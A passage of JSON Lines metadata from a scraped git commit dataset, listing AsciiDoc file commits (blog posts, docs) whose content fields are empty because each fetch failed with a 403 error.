scheduling","message":"Proposal of plan-based quota check, scaling and scheduling\n\nIssue #746\n","repos":"jenmalloy\/enmasse,EnMasseProject\/enmasse,jenmalloy\/enmasse,EnMasseProject\/enmasse,EnMasseProject\/enmasse,EnMasseProject\/enmasse,EnMasseProject\/enmasse,EnMasseProject\/enmasse,EnMasseProject\/enmasse,jenmalloy\/enmasse,jenmalloy\/enmasse,jenmalloy\/enmasse,jenmalloy\/enmasse,jenmalloy\/enmasse","old_file":"documentation\/design_docs\/design\/resource-scheduler.adoc","new_file":"documentation\/design_docs\/design\/resource-scheduler.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jenmalloy\/enmasse.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f3a5498487022a941c1562191cad052fa9aee497","subject":"Corrections and expansion to instructions for building from source","message":"Corrections and expansion to instructions for building from source\n\nChange-Id: I0a4b0ef2fba46972408b516e3df3432b8ae1ae23\nReviewed-on: http:\/\/gerrit.sjc.cloudera.com:8080\/7080\nTested-by: jenkins\nReviewed-by: Misty Stanley-Jones <266ae30cabf4e046de6d26e3d43b9d21b534ee4c@cloudera.com>\n","repos":"helifu\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,InspurUSA\/kudu,andrwng\/kudu,helifu\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,helifu\/kudu,helifu\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,helifu\/kudu,andrwng\/kudu,helifu\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,helifu\/kudu,andrwng\/kudu,cloudera\/kudu,cloudera\/kudu,andrwng\/kudu,andrwng\/kudu,andrwng\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,andrwng\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,cloudera\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu","old_file":"docs\/installation.adoc","new_file":"docs\/installation.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4ea1f0c4990d0ae51ee7667a08b6f2b25169b396","subject":"Update 2018-04-30-Pengalaman-Beli-dan-Rental-Film-di-i-Tunes.adoc","message":"Update 2018-04-30-Pengalaman-Beli-dan-Rental-Film-di-i-Tunes.adoc","repos":"lovian\/lovian.github.io,lovian\/lovian.github.io,lovian\/lovian.github.io,lovian\/lovian.github.io","old_file":"_posts\/2018-04-30-Pengalaman-Beli-dan-Rental-Film-di-i-Tunes.adoc","new_file":"_posts\/2018-04-30-Pengalaman-Beli-dan-Rental-Film-di-i-Tunes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lovian\/lovian.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2c638d03162f708b6ed6c55d7ba7abc1fc6a97f8","subject":"Link QCM","message":"Link QCM\n","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course,oliviercailloux\/jee","old_file":"Course Object\/Planning.adoc","new_file":"Course Object\/Planning.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a2e0bdf3a571918a966f62ac157825f68a36922f","subject":"y2b create post World's Smallest 3D Printing Pen","message":"y2b create post World's Smallest 3D Printing Pen","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-06-10-Worlds-Smallest-3D-Printing-Pen.adoc","new_file":"_posts\/2016-06-10-Worlds-Smallest-3D-Printing-Pen.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8026d57ee8c1aed57f71a36e16200bedf77ce7b7","subject":"Publish 1993-8-11-commoncommonfunctionphp-Hubpress-blog-usedcommonphp.adoc","message":"Publish 1993-8-11-commoncommonfunctionphp-Hubpress-blog-usedcommonphp.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"1993-8-11-commoncommonfunctionphp-Hubpress-blog-usedcommonphp.adoc","new_file":"1993-8-11-commoncommonfunctionphp-Hubpress-blog-usedcommonphp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2e2c1ae491b67c960a3289a896c2aad5623e084e","subject":"y2b create post Unboxing Preview \\\/ Mailbox SURPRISE!","message":"y2b create post Unboxing Preview \\\/ Mailbox SURPRISE!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-05-09-Unboxing-Preview--Mailbox-SURPRISE.adoc","new_file":"_posts\/2012-05-09-Unboxing-Preview--Mailbox-SURPRISE.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c74ab00020334f7d4560ff74003867bca73ad8a6","subject":"Update 2015-08-04-Scala-for-the-Impatient-Chapter-01.adoc","message":"Update 2015-08-04-Scala-for-the-Impatient-Chapter-01.adoc","repos":"hhimanshu\/hhimanshu.github.io,hhimanshu\/hhimanshu.github.io,hhimanshu\/hhimanshu.github.io","old_file":"_posts\/2015-08-04-Scala-for-the-Impatient-Chapter-01.adoc","new_file":"_posts\/2015-08-04-Scala-for-the-Impatient-Chapter-01.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hhimanshu\/hhimanshu.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d08b1196bce2017f84ac8179af4c21641fce2848","subject":"y2b create post Unboxing The World's Smallest Phone","message":"y2b create post Unboxing The World's Smallest Phone","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-01-06-Unboxing-The-Worlds-Smallest-Phone.adoc","new_file":"_posts\/2018-01-06-Unboxing-The-Worlds-Smallest-Phone.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"39266bf8e4dbde26975731047bf87574d6dddade","subject":"Update 2015-03-05-Nouveau.adoc","message":"Update 2015-03-05-Nouveau.adoc","repos":"fbridault\/sandblog,fbridault\/sandblog,fbridault\/sandblog","old_file":"_posts\/2015-03-05-Nouveau.adoc","new_file":"_posts\/2015-03-05-Nouveau.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fbridault\/sandblog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bbeac4618c402382204a2b253627714fc2920643","subject":"Update 2017-05-16-IDE-IDE.adoc","message":"Update 2017-05-16-IDE-IDE.adoc","repos":"miroque\/shirokuma,miroque\/shirokuma,miroque\/shirokuma,miroque\/shirokuma","old_file":"_posts\/2017-05-16-IDE-IDE.adoc","new_file":"_posts\/2017-05-16-IDE-IDE.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/miroque\/shirokuma.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8d3cf96a23756954a6f63d863d7e58b1c5aa7976","subject":"Renamed '_posts\/2017-08-19.adoc' to '_posts\/2017-08-19-Prepare.adoc'","message":"Renamed '_posts\/2017-08-19.adoc' to '_posts\/2017-08-19-Prepare.adoc'","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2017-08-19-Prepare.adoc","new_file":"_posts\/2017-08-19-Prepare.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5ddcb8a756345e2e72567457692d958231db2389","subject":"Update 2018-11-08-develop.adoc","message":"Update 2018-11-08-develop.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-11-08-develop.adoc","new_file":"_posts\/2018-11-08-develop.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"feccac96052e51038a39444ef58a9cb83b89bb7e","subject":"Update 2017-09-20-BPMN.adoc","message":"Update 2017-09-20-BPMN.adoc","repos":"egorlitvinenko\/egorlitvinenko.github.io,egorlitvinenko\/egorlitvinenko.github.io,egorlitvinenko\/egorlitvinenko.github.io,egorlitvinenko\/egorlitvinenko.github.io","old_file":"_posts\/2017-09-20-BPMN.adoc","new_file":"_posts\/2017-09-20-BPMN.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/egorlitvinenko\/egorlitvinenko.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"01bd08318a6120c9b89f6236430b116ba2a1c4e0","subject":"Update 2015-12-05-My-title.adoc","message":"Update 2015-12-05-My-title.adoc","repos":"MichaelIT\/MichaelIT.github.io,MichaelIT\/MichaelIT.github.io,MichaelIT\/MichaelIT.github.io","old_file":"_posts\/2015-12-05-My-title.adoc","new_file":"_posts\/2015-12-05-My-title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/MichaelIT\/MichaelIT.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ff27106aa7f8dfbc5366c3e5a8e25b55e86125d8","subject":"Update 2016-08-08-New-blog.adoc","message":"Update 2016-08-08-New-blog.adoc","repos":"danharr\/danharr.github.io,danharr\/danharr.github.io,danharr\/danharr.github.io,danharr\/danharr.github.io","old_file":"_posts\/2016-08-08-New-blog.adoc","new_file":"_posts\/2016-08-08-New-blog.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/danharr\/danharr.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c887a84416e7950702d0a3a213124b83c429b4f9","subject":"Update 2016-06-30-By-using-a-neural-style-playing-around-and-borrow-the-masterpiece-of-taste.adoc","message":"Update 2016-06-30-By-using-a-neural-style-playing-around-and-borrow-the-masterpiece-of-taste.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-06-30-By-using-a-neural-style-playing-around-and-borrow-the-masterpiece-of-taste.adoc","new_file":"_posts\/2016-06-30-By-using-a-neural-style-playing-around-and-borrow-the-masterpiece-of-taste.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bc303fc8a6f69400277f6d0708d2d2d04acf2599","subject":"Create Readme.adoc","message":"Create Readme.adoc","repos":"alejandroSuch\/angular-cli","old_file":"1.0.0-beta.22\/ubuntu\/Readme.adoc","new_file":"1.0.0-beta.22\/ubuntu\/Readme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/alejandroSuch\/angular-cli.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6527c6a1ab097415b181a3eb2d7acdb26ce6f40b","subject":"Update 2017-09-22-aa.adoc","message":"Update 2017-09-22-aa.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-09-22-aa.adoc","new_file":"_posts\/2017-09-22-aa.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9291f2264f9ad04f08c39e927009c6fca5c2ab49","subject":"Update 2018-09-08-Go.adoc","message":"Update 2018-09-08-Go.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-09-08-Go.adoc","new_file":"_posts\/2018-09-08-Go.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5f5fb4ef4c52c3854254f362cf50f6485b06c03d","subject":"rename getstarted to example","message":"rename getstarted to example\n","repos":"hibersap\/hibersap.github.io","old_file":"example\/index.adoc","new_file":"example\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hibersap\/hibersap.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a2125580ec7310cd5006887cc366ece7b6857144","subject":"blog: into to Hazelcast and Mongo","message":"blog: into to Hazelcast and Mongo\n","repos":"gAmUssA\/hazelcast-mongo-experiments","old_file":"Hazelcast For MongoDB users.adoc","new_file":"Hazelcast For MongoDB users.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gAmUssA\/hazelcast-mongo-experiments.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c5b62e43ef7a04344791c56ebf89626339758505","subject":"Adding a new blog entry","message":"Adding a new blog entry\n","repos":"luck3y\/wildfly.org,stuartwdouglas\/wildfly.org,ctomc\/wildfly.org,ctomc\/wildfly.org,luck3y\/wildfly.org,rhusar\/wildfly.org,ctomc\/wildfly.org,ctomc\/wildfly.org,luck3y\/wildfly.org,luck3y\/wildfly.org,stuartwdouglas\/wildfly.org,adrianoschmidt\/wildfly.org,rhusar\/wildfly.org,rhusar\/wildfly.org,adrianoschmidt\/wildfly.org,adrianoschmidt\/wildfly.org,stuartwdouglas\/wildfly.org,stuartwdouglas\/wildfly.org,rhusar\/wildfly.org,adrianoschmidt\/wildfly.org","old_file":"news\/2014-03-14-Http-Session-Failover-WildFly.adoc","new_file":"news\/2014-03-14-Http-Session-Failover-WildFly.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rhusar\/wildfly.org.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"45607198c7f3766b23ae0db52477c70e773d042e","subject":"Update 2015-06-01-My-lodashunderscorejs-Cheatsheet.adoc","message":"Update 2015-06-01-My-lodashunderscorejs-Cheatsheet.adoc","repos":"YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io","old_file":"_posts\/2015-06-01-My-lodashunderscorejs-Cheatsheet.adoc","new_file":"_posts\/2015-06-01-My-lodashunderscorejs-Cheatsheet.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/YannBertrand\/yannbertrand.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"66e488f9957683fee966e1b07de3f23be3ff1cb0","subject":"Update 2016-12-08-My-Development-Environment-Setup.adoc","message":"Update 2016-12-08-My-Development-Environment-Setup.adoc","repos":"faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io","old_file":"_posts\/2016-12-08-My-Development-Environment-Setup.adoc","new_file":"_posts\/2016-12-08-My-Development-Environment-Setup.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/faldah\/faldah.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"05388c52e6ed1967d5ff7713119eb66647c17bf6","subject":"Publish 20161110-1328-have-fun.adoc","message":"Publish 20161110-1328-have-fun.adoc","repos":"angilent\/angilent.github.io,angilent\/angilent.github.io,angilent\/angilent.github.io,angilent\/angilent.github.io","old_file":"20161110-1328-have-fun.adoc","new_file":"20161110-1328-have-fun.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/angilent\/angilent.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1b1b6985da1a6b4b8dbb156d12934b4804b95265","subject":"y2b create post It's My Favorite Smartphone Accessory (Seriously)","message":"y2b create post It's My Favorite Smartphone Accessory (Seriously)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-08-11-Its-My-Favorite-Smartphone-Accessory-Seriously.adoc","new_file":"_posts\/2017-08-11-Its-My-Favorite-Smartphone-Accessory-Seriously.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4accc5bf1d09d29dd6f10cfaee8e39f24ca8b484","subject":"Update 2016-11-07-Healthcare-has-a-No-Problem-Problem.adoc","message":"Update 2016-11-07-Healthcare-has-a-No-Problem-Problem.adoc","repos":"fqure\/fqure.github.io,fqure\/fqure.github.io,fqure\/fqure.github.io,fqure\/fqure.github.io","old_file":"_posts\/2016-11-07-Healthcare-has-a-No-Problem-Problem.adoc","new_file":"_posts\/2016-11-07-Healthcare-has-a-No-Problem-Problem.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fqure\/fqure.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bef48796da20e6e0b24cd8629352eef699fcf3a6","subject":"Updated instalation instructions after installing on Mac","message":"Updated instalation instructions after installing on Mac\n\nRemoved phantomjs instructions\r\nAdded the step to compile messages\r\nAdapted the text to consider the new fixtures files","repos":"uclouvain\/OSIS-Louvain,uclouvain\/OSIS-Louvain,uclouvain\/osis,uclouvain\/osis_louvain,uclouvain\/osis_louvain,uclouvain\/osis,uclouvain\/osis,uclouvain\/osis,uclouvain\/osis_louvain,uclouvain\/OSIS-Louvain","old_file":"doc\/technical-manual.adoc","new_file":"doc\/technical-manual.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/uclouvain\/osis.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"45a373b61e3551b805c62caa94780a49230212e0","subject":"JUnit init","message":"JUnit init\n","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course,oliviercailloux\/jee","old_file":"JUnit.adoc","new_file":"JUnit.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"df9c4e1ad590c4567d887ae7e28192e76b823fd0","subject":"Update 2016-03-18-Synchronizing-Living-Colors-gen2-round-remotes-Philips-Hue-bulbs-and-bridge-20-together.adoc","message":"Update 2016-03-18-Synchronizing-Living-Colors-gen2-round-remotes-Philips-Hue-bulbs-and-bridge-20-together.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-03-18-Synchronizing-Living-Colors-gen2-round-remotes-Philips-Hue-bulbs-and-bridge-20-together.adoc","new_file":"_posts\/2016-03-18-Synchronizing-Living-Colors-gen2-round-remotes-Philips-Hue-bulbs-and-bridge-20-together.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d434e63ed58dd589f77860d65275f3628adf8d2d","subject":"Fix an error in docs\/schema_design.adoc","message":"Fix an error in docs\/schema_design.adoc\n\nChange-Id: Ie95df5e3a732d4e78df334f36025a44436dc9447\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/1308\nReviewed-by: Todd Lipcon <2c763d726a8c2f6afda9be7e0e56a2caa6bb5e6b@cloudera.com>\nTested-by: Todd Lipcon <2c763d726a8c2f6afda9be7e0e56a2caa6bb5e6b@cloudera.com>\n","repos":"InspurUSA\/kudu,InspurUSA\/kudu,cloudera\/kudu,andrwng\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,cloudera\/kudu,andrwng\/kudu,InspurUSA\/kudu,helifu\/kudu,helifu\/kudu,andrwng\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,helifu\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,helifu\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,helifu\/kudu,cloudera\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,andrwng\/kudu,cloudera\/kudu,InspurUSA\/kudu,andrwng\/kudu,cloudera\/kudu,andrwng\/kudu,InspurUSA\/kudu","old_file":"docs\/schema_design.adoc","new_file":"docs\/schema_design.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"777970c877ecf61766c941f3302a235ec78a62e8","subject":"Add Common Lisp notes","message":"Add Common Lisp notes\n","repos":"cmpitg\/programming-language-notes","old_file":"Common-Lisp.adoc","new_file":"Common-Lisp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"fdccbf76114859b4764de0ee3c1810620af89c29","subject":"More on pathnames","message":"More on pathnames\n","repos":"cmpitg\/programming-language-notes","old_file":"Common-Lisp.adoc","new_file":"Common-Lisp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"af8db4f254afbd99aa4b090dcc3debbaa52700a4","subject":"Create Deeper\/testchapter2.adoc","message":"Create Deeper\/testchapter2.adoc","repos":"JClingo\/gitbook,JClingo\/gitbook,JClingo\/gitbook,JClingo\/gitbook,JClingo\/gitbook,JClingo\/gitbook","old_file":"Deeper\/testchapter2.adoc","new_file":"Deeper\/testchapter2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/JClingo\/gitbook.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"2705f6109d2dd12fe37113dcc3ed1fc30099d3b2","subject":"Update 2016-12-23-Larastudy.adoc","message":"Update 2016-12-23-Larastudy.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-12-23-Larastudy.adoc","new_file":"_posts\/2016-12-23-Larastudy.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"00935200deb2a4f754acfe9e19c8da50a93ccdec","subject":"Update installation-guide-repositories-elasticsearch.adoc","message":"Update installation-guide-repositories-elasticsearch.adoc","repos":"gravitee-io\/gravitee-docs,gravitee-io\/gravitee-docs,gravitee-io\/gravitee-docs","old_file":"pages\/apim\/installation-guide\/installation-guide-repositories-elasticsearch.adoc","new_file":"pages\/apim\/installation-guide\/installation-guide-repositories-elasticsearch.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gravitee-io\/gravitee-docs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"5e5286541ffdb9f75bb40500c5c72042c184d9b9","subject":"y2b create post 3 Cool Tech Deals - #11","message":"y2b create post 3 Cool Tech Deals - #11","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2015-11-15-3-Cool-Tech-Deals--11.adoc","new_file":"_posts\/2015-11-15-3-Cool-Tech-Deals--11.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5b26616665e36ca574a5ba60eb7937a24f6c15ad","subject":"Update 2016-07-22-Stable-Graph-Matching.adoc","message":"Update 2016-07-22-Stable-Graph-Matching.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-22-Stable-Graph-Matching.adoc","new_file":"_posts\/2016-07-22-Stable-Graph-Matching.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0923004027d4ca9e18adb21fc79df23c7e9c57ce","subject":"Update 2017-07-14-Pepper.adoc","message":"Update 2017-07-14-Pepper.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-07-14-Pepper.adoc","new_file":"_posts\/2017-07-14-Pepper.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f2c4810f2bcf6050d444edd11ac59b378264041e","subject":"Update 2016-08-31-Messing-around-with-markdown.adoc","message":"Update 2016-08-31-Messing-around-with-markdown.adoc","repos":"crisgoncalves\/crisgoncalves.github.io,crisgoncalves\/crisgoncalves.github.io,crisgoncalves\/crisgoncalves.github.io,crisgoncalves\/crisgoncalves.github.io","old_file":"_posts\/2016-08-31-Messing-around-with-markdown.adoc","new_file":"_posts\/2016-08-31-Messing-around-with-markdown.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/crisgoncalves\/crisgoncalves.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"456cfeb76653acefa5d82258720cf15aac3fe616","subject":"Create README.asciidoc","message":"Create README.asciidoc","repos":"TweetWallFX\/TweetwallFX,mklaehn\/TweetwallFX,reinhapa\/TweetwallFX,fvogler\/TweetwallFX,jmichelberger\/TweetwallFX,Map8524\/TweetwallFX,svenreimers\/TweetwallFX","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/reinhapa\/TweetwallFX.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"39f6ec0cdd7c6d857b8e68df7034bb323c716288","subject":"Publish 2016-08-09.adoc","message":"Publish 2016-08-09.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"2016-08-09.adoc","new_file":"2016-08-09.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a066bb9dc02d56bbeb2043d87e7133248af772c7","subject":"Update 2017-01-12-Quick-Tips-1-Centralizando-Elementos.adoc","message":"Update 